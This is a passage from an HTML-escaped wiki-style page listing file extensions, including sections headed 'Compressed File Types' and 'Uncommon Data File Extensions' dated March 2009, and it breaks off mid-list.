.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
